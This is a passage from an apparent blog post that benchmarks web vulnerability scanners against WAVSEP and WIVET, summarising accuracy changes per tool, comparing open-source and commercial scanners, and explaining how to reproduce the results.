&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Syhunt Dynamic &lt;/i&gt;&lt;/b&gt;-
a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of XSS (fantastic
result!) and SQLi, and new results for Path Traversal, RFI and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Burp Suite&lt;/i&gt;&lt;/b&gt; -
a dramatic improvement in the detection accuracy of XSS and SQLi (fantastic
result!), and new results for Path Traversal and WIVET.&lt;b&gt;&lt;i&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;ParosPro&lt;/i&gt;&lt;/b&gt; -
New results for Path Traversal and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;JSky&lt;/i&gt;&lt;/b&gt; - New
results for RFI, Path Traversal and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;WebCruiser&lt;/i&gt;&lt;/b&gt; -
No significant changes.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Nessus&lt;/i&gt;&lt;/b&gt; - a &lt;b&gt;dramatic
improvement&lt;/b&gt; in the detection accuracy of Reflected XSS, potential bug in
the LFI/RFI detection features.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Ammonite&lt;/i&gt;&lt;/b&gt; -
New results for RXSS, SQLi, RFI and Path Traversal (fantastic result!)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following list presents a summary of changes in the
detection accuracy of &lt;b&gt;free and open source&lt;/b&gt; tools that were tested in the
previous benchmark (+new):&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Zed Attack Proxy
(ZAP)&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;dramatic improvement &lt;/b&gt;in the detection accuracy of
Reflected XSS exposures (fantastic result!), in addition to new results for
Path Traversal and WIVET.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;IronWASP&lt;/u&gt;&lt;/b&gt; -
New results for SQLi, XSS, Path Traversal and RFI (fantastic result!).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;arachni&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;
– an &lt;b&gt;improvement &lt;/b&gt;in the detection accuracy of Reflected XSS exposures
(mainly due to the elimination of false positives), but a decrease in the
accuracy of SQL injection exposures (due to additional false positives being discovered).
There&#39;s also new results for RFI, Path Traversal (incomplete due to a bug), and
WIVET.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;sqlmap&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;
– a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of SQL Injection
exposures (fantastic result!).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Acunetix Free
Edition&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy
of Reflected XSS exposures, in addition to a new WIVET result.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Syhunt Mini (Sandcat
Mini)&lt;/u&gt;&lt;/b&gt; - a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of both
XSS (fantastic result!) and SQLi. New results for RFI.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Watobo&lt;/u&gt; &lt;/i&gt;&lt;/b&gt;–
Identical results, in addition to new results for Path Traversal and WIVET. The
author did not test the latest Watobo version, which was released a few days
before the publication of this benchmark.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;N&lt;/u&gt;&lt;/i&gt;&lt;u&gt;-Stalker
2012 &lt;i&gt;FE&lt;/i&gt;&lt;/u&gt; &lt;/b&gt;– no significant changes, although it seems that the
decreased accuracy is actually an unhandled bug in the release (unverified
theory).&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Skipfish &lt;/u&gt;&lt;/i&gt;&lt;/b&gt;–
&amp;nbsp;insignificant changes that probably
result from the testing methodology and/or testing environment. New results for
Path Traversal, RFI and WIVET.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;WebSecurify&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;
– a &lt;b&gt;major improvement&lt;/b&gt; in the detection accuracy of RXSS exposures, and
new results for Path Traversal and WIVET.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;W3AF&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; –
a slight increase in the SQL Injection detection accuracy. New results for Path
Traversal (fantastic result!), RFI and WIVET.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Netsparker
Community Edition&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – New results for WIVET.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Andiparos &amp;amp; Paros
&lt;/u&gt;&lt;/b&gt;– New results for WIVET.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Wapiti &lt;/u&gt;&lt;/b&gt;– New
results for Path Traversal, RFI and WIVET.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;ProxyStrike &lt;/u&gt;&lt;/b&gt;–
New results for WIVET (Fantastic results for an open source product! again!) &lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Vega&lt;/u&gt;&lt;/b&gt; - New
results for Path Traversal, RFI and WIVET.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Grendel Scan&lt;/u&gt;&lt;/b&gt;
– New results for WIVET.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;18. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Initial Conclusions – Open Source vs.
Commercial&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following section presents &lt;b&gt;my own personal&lt;/b&gt; &lt;b&gt;opinions&lt;/b&gt;
on the results, and is not based purely on accurate statistics, like the rest
of the benchmark. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
After testing various versions of over &lt;b&gt;51&lt;/b&gt; open source
scanners on multiple occasions, and after comparing the results and experiences
to the ones I had after testing &lt;b&gt;15&lt;/b&gt; commercial ones (including tools
tested in the previous benchmarks and tools I did not reported), I have reached
the following conclusions:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;As far as accuracy &amp;amp;
features, the distance between open source tools and commercial tools is insignificant,
and open source already rival, and in some rare cases, even exceed the
capabilities of commercial scanners (and vice versa).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Although most open source
scanners have not yet adjusted to support applications that use new
technologies (AJAX, JSON, etc), recent advancement in the crawler of ZAP proxy
(not tested in the benchmark, and might be reused by other projects), and the
input vectors supported by a new project named IronWASP are a great beginning
to the process. On the other hand, most of the commercial vendors already
adjusted themselves to &lt;b&gt;some&lt;/b&gt; of the new technologies, and can be used to
scan them in a variety of models.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The automated crawling
capability of most commercial scanners is significantly better than those of
open source projects, making these tools better for point and shot scenarios...
the difference however, is not significant for some open source projects, which
can &quot;import&quot; or employ the crawling capabilities of the a free
version of a commercial product (requires some experience with certain tools -
probably more suited for a consultant then a QA engineer).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l15 level1 lfo26; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Some open source tools, even
the most accurate ones, are relatively difficult to install &amp;amp; use, and
still require fine-tuning in various fields, particularly stability. Other open
source projects however, improved over the last year, and enhanced their user
experience in many ways.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;19. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Verifying The Benchmark Results&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The results of the benchmark can be verified by replicating
the scan methods described in the scan log of each scanner, and by testing the
scanner against WAVSEP v1.2 and WIVET v3-revision148.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The same methodology can be used to assess vulnerability
scanners that were not included in the benchmark.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The latest version of WAVSEP can be downloaded from the web
site of project WAVSEP (binary/source code distributions, installation
instructions and the test case description are provided in the web site
download section):&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The latest version of WIVET can be downloaded from the
project web site, or preferably, checked-out from the project subversion
repository:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
svn checkout http://wivet.googlecode.com/svn/trunk/ wivet-read-only&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;20. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;So What Now?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
So now that we have all those statistics, it&#39;s time to
analyze them properly, and see which conclusions we can get to. I already
started writing a couple of articles that will make the information easy to
use, and defined a methodology that will explain exactly how to use it.
Analyzing the results however, will take me some time, since most of my time in
the next few months will be invested in another project I&#39;m working on (will be
released soon), one I&#39;ve been working on for the past year.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since I didn&#39;t manage to test all the tools I wanted, I
might update the results of the benchmark soon with additional tools (so you
can think of it as a dynamic benchmark), and I will surely update the results
in sectoolmarket (made some promises).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
If you want to get notifications on new scan results, follow
my blog or twitter account, and i&#39;ll do my best to tweet notification when I
find the time to perform some major updates.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since I have already been in the situation in the past, then
I know what&#39;s coming… &lt;b&gt;so I apologize in advance for any delays in my
responses in the next few weeks, especially during august.&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
